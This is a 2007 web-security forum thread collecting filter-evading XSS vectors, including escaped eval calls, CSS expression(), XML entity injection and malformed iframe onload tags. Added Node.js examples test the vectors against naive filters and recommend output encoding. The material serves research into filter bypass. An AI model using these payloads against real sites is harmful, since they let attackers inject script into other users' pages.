Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: September 11, 2007 03:39PM

I've created this thread to store new XSS techniques, I'll start it off with a quoteless string without using fromCharCode:-


alert( String(/Test/).substr(1,4) );

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/28/2008 07:48AM by Gareth Heyes.

Re: New XSS vectors
Posted by: rsnake
Date: September 11, 2007 05:24PM

That can actually be shortened to:

<SCRIPT>alert(/XSS/.source)</SCRIPT>

- RSnake
Gotta love it. http://ha.ckers.org

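An added example (not code from the thread or from either poster) that generalises the quoteless trick in the two posts above and checks it against the kind of "strip the quotes" filter it is meant to get past. Runs under Node.js; `alert()` is replaced by a stub, and the vector list and filter are constructed for the example.

```javascript
// Added example, not code from the thread: the quoteless-string trick from the
// two posts above, generalised, plus the "strip the quotes" style of filter it
// is designed to get past. Runs under Node.js with alert() stubbed out.

// Build an expression with no quote character that evaluates to `text`,
// using /text/.source (String(/text/).substr(1, len) is the longer form).
// Only a conservative character set is accepted: '/' and regex
// metacharacters would change or break the regex literal.
function quoteless(text) {
  if (!/^[A-Za-z0-9 _:-]+$/.test(text)) {
    throw new Error('character not safe inside a regex literal: ' + text);
  }
  return '/' + text + '/.source';
}

// A naive output filter: considers a payload harmless when it contains no
// quote character and no String.fromCharCode call.
function naiveQuoteFilterBlocks(payload) {
  return /['"]|fromCharCode/.test(payload);
}

// Run a payload as an injected script would, with alert() replaced by a
// stub that records what it was called with.
function runWithStubbedAlert(payload) {
  const seen = [];
  const alert = (msg) => { seen.push(String(msg)); };
  new Function('alert', payload)(alert);
  return seen;
}

// Constructed test inputs: the thread's two vectors, a generated one, and a
// quoted control that the naive filter does catch.
const VECTORS = [
  'alert(String(/Test/).substr(1,4))',
  'alert(/XSS/.source)',
  'alert(' + quoteless('XSS') + ')',
  "alert('XSS')",
];

// One row per vector: was it blocked, and what did alert() receive when run.
function report() {
  return VECTORS.map((payload) => ({
    payload,
    blocked: naiveQuoteFilterBlocks(payload),
    alerted: runWithStubbedAlert(payload),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(report());
}
```

The first three rows pass the filter and still deliver the string to `alert()`; only the quoted control is stopped, which is the point of the vector: the string was never quoted, so removing quotes changes nothing.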
Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 11, 2007 05:42PM

Nice!

Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 12, 2007 09:38AM

Using DOM nodes without calling document.DOMFUNCTION

<p><a onclick="i=createElement('iframe');i.src='javascript:alert(/XSS/)';x=parentNode;x.appendChild(i);" href="#">Test</a></p>

Re: New XSS vectors
Posted by: DoctorDan
Date: September 12, 2007 02:32PM

<!-- -- -- -- --<script>alert('XSS')</script> -- -->

It doesn't play nicely with tags around it, as it's a malformed comment. It works in FF and may bypass some obscure filter.

IE is known to loop code in the style expression() vector. Here's a fix...
<div style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCode(88,83,83));'))">

-Dan

Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 12, 2007 05:53PM

Dan cool stuff :)

Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 13, 2007 02:17AM

IE only:-
URL='javascript:alert(/XSS/)'

e.g. <a onclick="URL='javascript:alert(/XSS/)'" href="#">Test</a>

Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 16, 2007 07:44PM

123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>);

Re: New XSS vectors
Posted by: thornmaker
Date: September 16, 2007 11:13PM

that's a very clever one Gareth!

Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 17, 2007 08:53AM

More XML stuff:-
a=<r><s>eva</s><s>l</s><a>ale</a><a>rt</a><a>(1)</a></r>
0[a.s.text()](a.a.text()+'')

Re: New XSS vectors
Posted by: thornmaker
Date: September 17, 2007 01:41PM

you could probably use xpath as well to extract the text, though it probably won't look as cool as just a.s.text(). anyhow, mozilla.org has a good writeup... see http://developer.mozilla.org/en/docs/Introduction_to_using_XPath_in_JavaScript

Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 17, 2007 03:13PM

Cool might do a xpath example, if I get chance

Thanks

Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 18, 2007 03:49AM

Awesome injection:-
x='\x61\x6c\x65\x72\x74\x28\x31\x29';
new Function(x)()

// By Me & .Mario

Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 18, 2007 04:15AM

eval('alert(1)'):-

0['\x65\x76\x61\x6c']('\x61\x6c\x65\x72\x74\x28\x31\x29');



Edited 1 time(s). Last edit at 09/18/2007 04:15AM by Gareth Heyes.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 18, 2007 05:25AM

Function('a\x6cert(1)')();

Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 18, 2007 07:14AM

Eval + Unicode attack :-

x=eval,1,1,1;1;
1,1,1,b='\\',1,1,1;
1,1,1,s='\'',1,1,1;
1,1,1,o='0',1,1,1;
x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) );

Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 19, 2007 08:06PM

<p>
<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41">Test</a>
</p>


Re: New XSS vectors
Posted by: Greg
Date: September 26, 2007 01:31PM

Hi!

I really like this one because it uses very few different characters (it doesn't need parentheses!):

ev setter=eval,dec setter=unescape,location.ss setter=String.prototype.substring,ev=dec=location.ss=21

the actual code is provided in the hash part of the URL like : hxxp://test.com/test#alert(%22XSS%22)

It doesn't work in IE though :-(



Edited 1 time(s). Last edit at 09/26/2007 01:33PM by Greg.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 26, 2007 01:35PM

Nice stuff Greg!


Re: New XSS vectors
Posted by: thornmaker
Date: September 28, 2007 02:41AM

"><script>eval(location.hash)</script> //where the url hash is: #0={};<<payload>>

note the missing .substr(1)

http://p42.us/#0=%7b%7d%3b

[edit]: Firefox only



Edited 1 time(s). Last edit at 09/28/2007 02:51AM by thornmaker.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 28, 2007 03:34AM

Cool stuff thornmaker!


Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 30, 2007 04:08PM

You can use square brackets to call string functions (or others) like this:-
s = ! isNaN(1) ? 'javascriptz:zalertz(1)z' [/replace/ [ 'source' ] ](/z/g, [] ) : 0

Even break it up on new lines:-
s = ! isNaN(1) ? 'javascriptz:zalertz(1)z' [/replace/ [ 'source' ]
](/z/g, []
) : 0

Notice dots aren't required


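An added example (not code from the thread or from the posters) that covers two groups of posts: the hex- and octal-escaped eval forms of 18 September (`new Function(x)()`, `0['\x65\x76\x61\x6c']`, the octal "Eval + Unicode" build) and the dot-free square-bracket call of 30 September. It generates the escaped forms and runs them against a constructed keyword blacklist. Runs under Node.js; `alert()` is stubbed on the global object. The `globalThis[...]` lookup is an assumption standing in for the thread's `0[...]` form, which relied on `Object.prototype.eval`, a SpiderMonkey extension that current engines no longer have.

```javascript
// Added example, not code from the thread: generators for the hex- and
// octal-escaped forms used in the posts of 18 September and the dot-free
// bracket call of 30 September, run against a keyword blacklist. Runs under
// Node.js with alert() stubbed on the global object.

// "\x61\x6c..." form: every character as a two-digit hex escape.
function toHexEscapes(s) {
  return Array.from(s, (c) => '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
}

// "\141\154..." form: three-digit octal escapes. These are legacy syntax and
// rejected in strict-mode code, so they only work in sloppy-mode contexts
// such as an injected inline script or an indirect eval.
function toOctalEscapes(s) {
  return Array.from(s, (c) => '\\' + c.charCodeAt(0).toString(8).padStart(3, '0')).join('');
}

// Keyword blacklist of the kind these vectors are built to slip past:
// the obvious names plus dotted property access.
function keywordFilterBlocks(payload) {
  return /\beval\b|\balert\b|fromCharCode|\./.test(payload);
}

// Evaluate in global scope (indirect eval, sloppy mode) with alert() stubbed.
function runPayload(payload) {
  const alerts = [];
  const saved = globalThis.alert;
  globalThis.alert = (msg) => { alerts.push(String(msg)); };
  try {
    return { alerts, result: (0, eval)(payload) };
  } finally {
    if (saved === undefined) delete globalThis.alert; else globalThis.alert = saved;
  }
}

// Constructed vectors. The thread's 0['\x65\x76\x61\x6c'] relied on
// Object.prototype.eval (old SpiderMonkey, since removed); the bracket
// lookup on globalThis is the equivalent on current engines.
const VECTORS = [
  "x='" + toHexEscapes('alert(1)') + "';new Function(x)()",
  "Function('a\\x6cert(1)')()",
  "globalThis['" + toHexEscapes('eval') + "']('" + toHexEscapes('alert(1)') + "')",
  "globalThis['" + toOctalEscapes('eval') + "']('" + toOctalEscapes('alert(1)') + "')",
  "'javascriptz:zalertz(1)z'[/replace/['source']](/z/g,[])",
  "eval('alert(1)')",
];

// One row per vector: blocked by the blacklist, what alert() received, and
// the expression's own value (the bracket-call vector builds a URL).
function report() {
  return VECTORS.map((payload) => ({ payload, blocked: keywordFilterBlocks(payload), ...runPayload(payload) }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(report());
}
```

Only the last, undisguised vector is blocked; every other row reaches `alert(1)` or assembles `javascript:alert(1)` without the words `eval` or `alert` or a single dot appearing in the source. Keyword matching on script content does not work; the fix is context-aware output encoding so the payload never becomes script in the first place.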
Re: New XSS vectors
Posted by: Anonymous User
Date: October 05, 2007 04:48AM

Another one abusing unicode characters, or rather their index in the unicode table:

$ =
[ '&#24940;' ['charCodeAt'] //
(0)
,'&#25970;' ['charCodeAt'] //
(0)
,'&#29736;' ['charCodeAt'] //
(0)
,'&#8824;' ['charCodeAt'] //
(0)
,'&#29555;' ['charCodeAt'] //
(0)
,'&#8745;' ['charCodeAt'] //
(0)
]
new //
Function //
(
decodeURI //
( //
( //
$[0] //
['toString'] //
(16) + 
$[1] //
['toString'] //
(16) +
$[2] //
['toString'] //
(16) +
$[3] //
['toString'] //
(16) +
$[4] //
['toString'] //
(16) +
$[5] //
['toString'] //
(16)
) 
['replace'] 
(/(\w{2})/g, 
'%$1')
) //
) //
( //
) //

This one won't run in the console and the forum displays the unicode chars as entities, so here's a link:
http://www.php-ids.org/files/vector.html

Re: New XSS vectors
Posted by: jmanico
Date: October 11, 2007 06:37AM

Luckily HTML entity encoding protects against all of this! :)

http://www.owasp.org/index.php/How_to_perform_HTML_entity_encoding_in_Java



Edited 1 time(s). Last edit at 10/11/2007 06:38AM by jmanico.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: October 11, 2007 06:55AM

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html [
<!ENTITY inject "&#60;script&#62;alert(1)&#60;/script&#62;">
]>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Test</title>
</head>

<body>
&inject;
</body>
</html>


Re: New XSS vectors
Posted by: kuza55
Date: October 11, 2007 07:59AM

@Gareth:
Does the doctype/entity declaration have to occur before the opening html tag?

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Re: New XSS vectors
Posted by: Gareth Heyes
Date: October 11, 2007 08:13AM

I've not looked into it a lot but it seems like it. You can call external DTDs which in turn can link to entities. I'd try things like including multiple HTML documents etc. Also it seems the entity encodings only work for XML files, although other things may be possible; I will post future research.

XML POC here:-
http://www.businessinfo.co.uk/labs/xml_injection/inject.xml

Another neat thing with this is that you can redefine existing HTML entities so &nbsp; becomes <script>alert(1)</script> hehe




Edited 1 time(s). Last edit at 10/11/2007 09:11AM by Gareth Heyes.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: October 11, 2007 10:34AM

Right I had a bit of spare time to investigate a little and I've found the following:-

1. It can only be called using XML.
2. External DTDs' entities are not parsed by Firefox.
3. The entities have to be included within the document type definition.
4. HTML cannot be extended with entities etc.

Still more scope for experimentation but I hope that clears up a few things for everyone.


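An added example (not code from the thread or from the poster) of what an XML parser does with the `<!DOCTYPE html [ <!ENTITY ...> ]>` block in the XHTML post above, together with the input check a practitioner would want: a minimal expander for internal general entities and a function that flags user-supplied XML that declares its own entities. It is deliberately not a full XML parser (no nested expansion, no external or parameter entities), the sample document is the post's reconstructed as a constant, and it runs under Node.js.

```javascript
// Added example, not code from the thread: a minimal expander for internal
// general entities, showing what an XML parser does with the post's
// <!DOCTYPE html [ <!ENTITY ...> ]> block, plus a check that flags such
// declarations in user-supplied XHTML. Handles <!ENTITY name "value"> in the
// internal subset, numeric character references inside the value, and &name;
// references in the body. No nested expansion, no external/parameter entities.

// The post's document, reconstructed as sample input.
const SAMPLE_XHTML = [
  '<?xml version="1.0" encoding="UTF-8"?>',
  '<!DOCTYPE html [',
  '<!ENTITY inject "&#60;script&#62;alert(1)&#60;/script&#62;">',
  ']>',
  '<html xmlns="http://www.w3.org/1999/xhtml">',
  '<head><title>Test</title></head>',
  '<body>&inject;</body>',
  '</html>',
].join('\n');

// &#60; and &#x3C; inside an entity value become the characters they name;
// that is how the declaration carries '<' through the well-formedness rules.
function decodeCharRefs(s) {
  return s.replace(/&#(x[0-9a-fA-F]+|[0-9]+);/g, (_, n) =>
    String.fromCodePoint(n[0] === 'x' ? parseInt(n.slice(1), 16) : parseInt(n, 10)));
}

// The internal DTD subset: text between '[' and ']>' of the DOCTYPE, or null.
function internalSubset(xml) {
  const m = /<!DOCTYPE\s[^[>]*\[([\s\S]*?)\]\s*>/i.exec(xml);
  return m ? m[1] : null;
}

// Internal general entity declarations as a name -> decoded value map.
function declaredEntities(xml) {
  const entities = new Map();
  const subset = internalSubset(xml);
  if (subset === null) return entities;
  const decl = /<!ENTITY\s+([A-Za-z_:][\w.:-]*)\s+(?:"([^"]*)"|'([^']*)')\s*>/g;
  let m;
  while ((m = decl.exec(subset)) !== null) {
    entities.set(m[1], decodeCharRefs(m[2] !== undefined ? m[2] : m[3]));
  }
  return entities;
}

// Replace &name; in the document body with the declared values; references
// to undeclared names (including the predefined amp/lt/gt/quot/apos) are kept.
function expandInternalEntities(xml) {
  const entities = declaredEntities(xml);
  const doctype = /<!DOCTYPE\s[^[>]*\[[\s\S]*?\]\s*>/i.exec(xml);
  const cut = doctype ? doctype.index + doctype[0].length : 0;
  const body = xml.slice(cut).replace(/&([A-Za-z_:][\w.:-]*);/g,
    (ref, name) => (entities.has(name) ? entities.get(name) : ref));
  return xml.slice(0, cut) + body;
}

// Input check: user-supplied XML that declares its own entities should be
// rejected, or served with a non-XML content type, rather than passed through.
function declaresEntities(xml) {
  return declaredEntities(xml).size > 0;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(expandInternalEntities(SAMPLE_XHTML));
}
```

The expanded output has `<body><script>alert(1)</script></body>` where the source only had `&inject;`, which is why an entity-encoding output filter (the previous post's suggestion) does not help once the document is parsed as XML: the encoded characters are decoded by the DTD machinery before the markup is built.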
Re: New XSS vectors
Posted by: Gareth Heyes
Date: October 17, 2007 05:21AM

I did a bit of targeted fuzzing on an iframe for fun, here are the results:-

<iframe/ /onload=alert(/XSS/)></iframe>
<iframe/ "onload=alert(/XSS/)></iframe>
<iframe///////onload=alert(/XSS/)></iframe>
<iframe "onload=alert(/XSS/)></iframe>
<iframe<?php echo chr(11)?> onload=alert(/XSS/)></iframe>
<iframe<?php echo chr(12)?> onload=alert(/XSS/)></iframe>


Re: New XSS vectors
Posted by: Anonymous User
Date: October 17, 2007 07:50AM

<iframe/what ever you like in here!!!

even line breaks

/onload=alert(/xss/)></iframe>

Confirmed on FF 2.0.0.7 and IE7

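An added example (not code from the thread or from either poster) that runs the fuzzed `<iframe>` forms from the two posts above against two constructed checks: the regex most people write, which assumes whitespace after the tag name, and a small attribute-name tokeniser that treats `/`, quotes and C0 control characters as separators the way the lenient parsers these vectors target did. The vector list is the posted one with the PHP `chr(11)`/`chr(12)` placeholders replaced by the bytes themselves; runs under Node.js.

```javascript
// Added example, not code from the thread: the fuzzed <iframe> forms above
// run against a whitespace-assuming regex and a lenient attribute tokeniser.
// Constructed vectors: the posted ones, with chr(11)/chr(12) as real bytes.
const VECTORS = [
  '<iframe/ /onload=alert(/XSS/)></iframe>',
  '<iframe/ "onload=alert(/XSS/)></iframe>',
  '<iframe///////onload=alert(/XSS/)></iframe>',
  '<iframe "onload=alert(/XSS/)></iframe>',
  '<iframe\x0b onload=alert(/XSS/)></iframe>',
  '<iframe\x0c onload=alert(/XSS/)></iframe>',
  '<iframe/what ever you like in here!!!\n\neven line breaks\n\n/onload=alert(/xss/)></iframe>',
];

// Check 1: "<iframe" followed by whitespace, then an on*= handler in the tag.
function naiveHandlerFilter(html) {
  return /<iframe\s+[^>]*\bon\w+\s*=/i.test(html);
}

// Characters a lenient tag parser has treated as ending a name or separating attributes.
const SEP = /[\s\/"'\x00-\x1f]/;

// Attribute names of one tag (the text between '<' and '>'), lower-cased.
function attributeNames(tag) {
  const names = [];
  let i = 0;
  while (i < tag.length && !SEP.test(tag[i])) i++;           // tag name
  while (i < tag.length) {
    while (i < tag.length && SEP.test(tag[i])) i++;          // separators
    let name = '';
    while (i < tag.length && !SEP.test(tag[i]) && tag[i] !== '=') name += tag[i++];
    if (name !== '') names.push(name.toLowerCase());
    if (tag[i] === '=') {                                     // skip the value
      i++;
      while (i < tag.length && /\s/.test(tag[i])) i++;
      if (tag[i] === '"' || tag[i] === "'") {
        const quote = tag[i++];
        while (i < tag.length && tag[i] !== quote) i++;
        i++;
      } else {
        while (i < tag.length && !/\s/.test(tag[i])) i++;
      }
    }
  }
  return names;
}

// Check 2: any tag whose attribute names include an event handler.
function lenientHandlerFilter(html) {
  const tag = /<([^>]+)>/g;
  let m;
  while ((m = tag.exec(html)) !== null) {
    if (attributeNames(m[1]).some((name) => name.startsWith('on'))) return true;
  }
  return false;
}

// One row per vector: what each check says.
function report() {
  return VECTORS.map((v) => ({
    vector: JSON.stringify(v),
    naive: naiveHandlerFilter(v),
    lenient: lenientHandlerFilter(v),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(report());
}
```

The regex misses every variant where `/` follows the tag name (the first three and the last), because `\s` does not match `/`; it happens to catch the quote and control-character forms only because JavaScript's `\s` includes vertical tab and form feed. The tokeniser flags all seven, but it is deliberately over-broad: the HTML5 tokeniser in current browsers treats a quote as part of the attribute name and a vertical tab as part of the tag name, so which of these actually fire is a per-parser question. That is the practical lesson of the fuzzing: pattern-matching the tag syntax is guessing at the parser, and the dependable fix is to encode untrusted data for the context it lands in rather than to recognise dangerous tags.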